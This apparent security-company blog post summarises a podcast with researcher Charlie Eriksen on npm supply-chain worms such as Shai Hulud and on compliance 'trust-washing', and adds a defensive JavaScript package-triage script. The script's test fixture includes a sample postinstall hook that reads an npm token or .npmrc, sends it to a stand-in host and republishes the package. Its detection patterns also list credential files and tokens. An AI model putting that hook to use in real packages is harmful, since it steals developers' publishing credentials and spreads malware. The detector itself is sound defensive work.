
From gaming frontlines to supply chain zero-day: A deep dive into software security with Charlie Eriksen

Jan 5, 2026



When the foundations of our digital world are built on billions of lines of open-source code, are we doing enough to protect them? And what happens when the very mechanism of compliance becomes a loophole?

Our CEO, Björn, recently sat down with security expert Charlie Eriksen, a Security Researcher at Aikido Security and Founder of JSWZL, on the latest "Hack & Tell" podcast. Their chat began with a trip through Charlie's career, from working security in the gaming world to spotting and dissecting the next big supply chain worm. They then moved on to security and trust in open source software and the software supply chain.

Keep reading for a glimpse into their discussion. Or watch or listen to the full podcast episode, if you prefer.

The wild ride: Lessons from the trenches of gaming security

Charlie's path into the modern security frontier began in an intense environment: gaming. While at CCP Games in Iceland, his responsibilities spanned far beyond typical IT security.


“I was dealing with botting, cheating in the game, money laundering, and real money trading. I also dealt with organized crime including nation states. I even caused a diplomatic incident with Russia once. It was a wild ride. The gaming industry is a crazy world.” -Charlie Eriksen

This intensely fast-paced world, where threats were constant and the stakes involved real-world money and geopolitical concerns, laid the foundation for his next moves into offensive security at Syndis and later co-founding the hands-on security training company, Adversary (later acquired by Secure Code Warrior).

In order to build secure software, you have to be able to break it

After leaving Syndis, Charlie was instrumental in founding Adversary, which grew out of a crucial question posed after a major security incident: How do we prevent this from happening again?

Charlie’s answer was unconventional: training, but make it hands-on.

“I wanted to do it in a way that I would want to learn it, which is hands-on.”

This philosophy reflects a core belief that still drives him today: for you to be able to build things really well, you also need to be able to break them. This principle defines the current work Charlie does at Aikido Security, where his focus has shifted from finding flaws in proprietary systems to identifying malicious code in the building blocks of the modern internet.

Malware vs. vulnerability: Hunting the supply chain threat

Charlie’s current role as a Security Researcher focuses heavily on malware research, particularly within the open-source supply chain. While it shares the "curiosity" of vulnerability research, the objective is different.

  • Malware Research: Focuses on analyzing malicious software (threats already in the wild) to understand its behavior, origin, and capabilities, with the goal of automated detection and remediation. For Charlie, this means looking at code all day across ecosystems like npm packages, VS Code extensions, and Rust crates, trying to identify and block malicious packages before they reach developers.
  • Vulnerability Research: Seeks to identify flaws and weaknesses in software and systems (potential threats) before they are exploited, with the goal of proactive patching and defense. This is often the domain of ethical hacking and pentesting.

The sheer volume of new code makes automation critical. He states that Aikido analyzes 50,000 packages a day, and automated rules clear the vast majority of them. However, Charlie stresses that human expertise remains vital: analysts triage the hundreds of packages that get flagged each day and feed what they learn back into the automated rules.

A wake-up call for the industry: Shai Hulud and the NPM incidents

The discussion quickly moved on to recent, high-impact incidents that prove the urgency of Charlie’s work, most notably the 2025 compromises in the npm ecosystem.

  • The debug/chalk compromise: An incident that hijacked multiple heavily downloaded packages, including debug and chalk, potentially exposing vast swathes of cloud environments to whatever payload the attackers chose to ship. As Charlie noted, the industry was "really lucky" that the attackers were unsophisticated and simply trying to steal cryptocurrency.
  • The Shai Hulud incident: Described as a "wake-up call," this attack featured worming behavior: the ability to spread automatically by using credentials harvested on an infected machine to compromise further packages.

“If you had had the debug chalk incident using the payload from Shai Hulud, I don't even wanna speculate about what would've happened. It would have been potentially catastrophic.”

Since this episode was recorded, Shai Hulud struck again. Read more about the incident in Charlie’s own words here.

These events highlight the fragile balance between the trust placed in open-source ecosystems and the potential for widespread compromise. The threat model has changed: attackers aren't just targeting the production server. They are targeting the developer’s machine, stealing the publishing credentials and tokens stored there, and using them to inject malicious code into the supply chain.
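The two passages above describe the work as a funnel (automated rules clear most of the daily package volume, humans triage what gets flagged) and a threat model (install-time code that reads developer credentials and republishes itself). The script below is an added illustration written for this article, not Aikido's scanner: it scores a package manifest plus its sources against a handful of indicators that match that threat model. The rule list, weights, review threshold, environment-variable names and both sample packages (including the `example.invalid` URL) are constructed for the demo.

```javascript
'use strict';

// Heuristic triage of an npm package for install-time malware indicators.
// Added illustration for this article, not Aikido's tooling: rule weights,
// the review threshold and the indicator lists are assumptions for the demo.

const LIFECYCLE_SCRIPTS = ['preinstall', 'install', 'postinstall', 'prepare'];
const CREDENTIAL_ENV = ['NPM_TOKEN', 'NODE_AUTH_TOKEN', 'GITHUB_TOKEN', 'GH_TOKEN', 'AWS_SECRET_ACCESS_KEY'];
const CREDENTIAL_FILES = ['.npmrc', '.git-credentials', '.aws/credentials', '.ssh/id_'];

// Each rule inspects the parsed manifest and the concatenated JS sources.
const RULES = [
  { id: 'lifecycle-script', weight: 3, // code runs at install time, not just when imported
    hit: ({ manifest }) => LIFECYCLE_SCRIPTS.some((s) => manifest.scripts?.[s]) },
  { id: 'child-process', weight: 2,
    hit: ({ source }) => /require\(\s*['"]child_process['"]\s*\)|from\s+['"]child_process['"]/.test(source) },
  { id: 'credential-env-read', weight: 4, // reads publishing/CI tokens from the environment
    hit: ({ source }) => CREDENTIAL_ENV.some((v) => new RegExp(`env\\s*(\\.|\\[\\s*['"])${v}`).test(source)) },
  { id: 'credential-file-read', weight: 4, // touches credential files in the developer's home
    hit: ({ source }) => CREDENTIAL_FILES.some((p) => source.includes(p)) },
  { id: 'outbound-network', weight: 1, // weak on its own, strong combined with the above
    hit: ({ source }) => /\bfetch\(|https?\.request\(|\.post\(/.test(source) },
  { id: 'self-publish', weight: 5, // worm indicator: the package publishes packages itself
    hit: ({ source }) => /npm\s+publish\b|npm\s+dist-tag\b/.test(source) },
  { id: 'obfuscation', weight: 3, // eval/Function or a long base64 blob being decoded
    hit: ({ source }) => /\beval\(|new Function\(|atob\(|from\(\s*['"][A-Za-z0-9+\/=]{200,}['"]\s*,\s*['"]base64['"]/.test(source) },
];

const REVIEW_THRESHOLD = 8; // assumption: at or above this score a human looks at it

// pkg = { manifest: <parsed package.json>, files: { 'path.js': '<contents>' } }
function triagePackage(pkg) {
  const source = Object.values(pkg.files).join('\n');
  const ctx = { manifest: pkg.manifest, source };
  const matched = RULES.filter((r) => r.hit(ctx));
  const score = matched.reduce((sum, r) => sum + r.weight, 0);
  return {
    name: pkg.manifest.name,
    score,
    findings: matched.map((r) => r.id),
    verdict: score >= REVIEW_THRESHOLD ? 'review' : 'pass',
  };
}

// Automation clears everything below the threshold; only 'review' items reach a human.
function triageBatch(packages) {
  const results = packages.map(triagePackage);
  return {
    results,
    forHumanReview: results.filter((r) => r.verdict === 'review').map((r) => r.name),
  };
}

// Constructed sample: an ordinary library with no install-time behaviour.
const benignPackage = {
  manifest: { name: 'tiny-colors', version: '1.0.0', main: 'index.js', scripts: { test: 'node test.js' } },
  files: {
    'index.js': `
      const CODES = { red: 31, green: 32 };
      module.exports = (name, text) => '[' + CODES[name] + 'm' + text + '[0m';
    `,
  },
};

// Constructed sample mimicking the pattern the article describes: a postinstall
// hook that reads the developer's npm token, exfiltrates it, and republishes.
const suspiciousPackage = {
  manifest: { name: 'tiny-colors-utils', version: '1.0.1', scripts: { postinstall: 'node setup.js' } },
  files: {
    'setup.js': `
      const { execSync } = require('child_process');
      const fs = require('fs'), os = require('os'), path = require('path');
      const token = process.env.NPM_TOKEN || fs.readFileSync(path.join(os.homedir(), '.npmrc'), 'utf8');
      fetch('https://example.invalid/collect', { method: 'POST', body: token });
      execSync('npm publish --tag latest');
    `,
  },
};

console.log(JSON.stringify(triageBatch([benignPackage, suspiciousPackage]), null, 2));
```

The scoring is deliberately additive: a lifecycle script or a network call alone is ordinary, but a lifecycle script that reads `.npmrc`, posts somewhere and then runs `npm publish` is the shape of a worm, and the combination is what pushes a package over the threshold into the human queue. Real tooling would also unpack the tarball, follow `require` chains and compare against the package's previous versions; this block only shows the triage decision.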

The added challenge of trust-washing

Perhaps the most challenging concept raised in the discussion was "trust-washing" in open-source software, which reveals a critical flaw in how we approach security and compliance today.

But first…

What is trust-washing?

Charlie points out that open-source components are routinely exempted from the detailed security scrutiny that compliance audits apply to in-house code.

“Effectively, when there are carve outs for open source components in any kind of compliance regulation, it effectively becomes a trust washing mechanism...”

Since virtually every application is built on code the company doesn't own, and the company has no way to inspect the security practices of the maintainers behind it, auditors end up carving that code out of scope. This creates a dangerous paradox:

  • The problem: The deepest, most complex parts of the application are effectively exempted from the security stamp of approval.
  • The result: A false sense of security where compliance is achieved simply by outsourcing the risk to an un-auditable third-party (the open-source maintainer).

“Everything we build is built on someone else’s code.”

Charlie argues that this challenge is not just an internal problem for companies, but a systemic failure of the ecosystem itself to self-regulate.

A look ahead: What business leaders must do

Given the shifting threat landscape, the rise of AI-assisted development, and the fragility of the supply chain, the discussion concluded with advice for business leaders on navigating this new reality.

1. Embrace continuous security

Cybersecurity is not a project. It is a continuous, evolving process, and a permanent line item on the profit and loss statement.

“It’s not a question of if something will happen, it's when and how do you minimize damage?… There’s no winning.”

Business leaders must move past the idea of achieving a "terminal state" of security. Instead, they must foster a culture of continuous improvement, risk-minimization, and rapid response.

2. Implement guardrails, not just training

While awareness training is important, it is not the sole solution. With AI accelerating development, real-time feedback and guardrails are essential.

“We are literally flying by the edge of the seat at this point.”

3. Cultivate humility and slow down

Ultimately, Charlie believes that even the most senior, technical employees need a dose of self-awareness.

“Sometimes we have to get off our high horses and realize we are just human beings and not be so arrogant.”

In a world driven by instant gratification and the pressure to ship fast, the best advice for security is to slow down and hold ourselves accountable for the code we produce. Good things take time. In security, skipping the final 20% of effort is what leads to catastrophic breaches.

Offense is the best defense

Concluding the conversation on the future of security, Charlie emphasized the need for adaptability and the belief that offense is the best defense.

“I still think offense is the best defense in many ways. And it is an arms race in terms of certainly vulnerability research. It's a question of who finds the vulnerabilities first.”



The investment in security research and defense is paramount, and every company must recognize it is a new "border" subject to attack. Securing the future means questioning existing norms, balancing the speed of innovation with caution, and fostering a culture where security is fundamentally interwoven with development and management—a lesson that is being written in blood across the digital world.


This article is based on a podcast episode with Charlie Eriksen from the "Hack and Tell" podcast series.

Watch the full episode on YouTube:



Or listen on Spotify.

Stay ahead, stay secure.